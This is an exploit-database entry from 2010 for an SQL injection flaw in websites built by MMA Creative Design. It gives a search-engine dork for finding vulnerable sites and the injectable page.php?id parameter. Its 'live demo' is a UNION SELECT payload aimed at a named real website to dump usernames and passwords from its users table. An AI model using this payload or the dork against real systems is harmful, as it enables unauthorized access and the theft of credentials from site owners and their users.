MMA Creative Design SQL Injection Vulnerability

2010-05-23T00:00:00
ID 1337DAY-ID-12364
Type zdt
Reporter XroGuE
Modified 2010-05-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===============================================
MMA Creative Design SQL Injection Vulnerability
===============================================


##########################################
# Name: MMA Creative Design SQL Injection Vulnerability
# Date: 2010-05-23
# vendor: www.mmacreative.com
# Author: Ashiyane Digital Security Team
# Discovered By: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork:  intext:"Design by MMA Creative"

[+] Vulnerability: http://[site]/[path]/page.php?id=[SQLi] 

[+] Live Demo: http://nelsonbibles.com/authors.php?id=-999+UNION+SELECT+1,2,group_concat(id,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11,12+from+users


##########################################



#  0day.today [2018-02-13]  #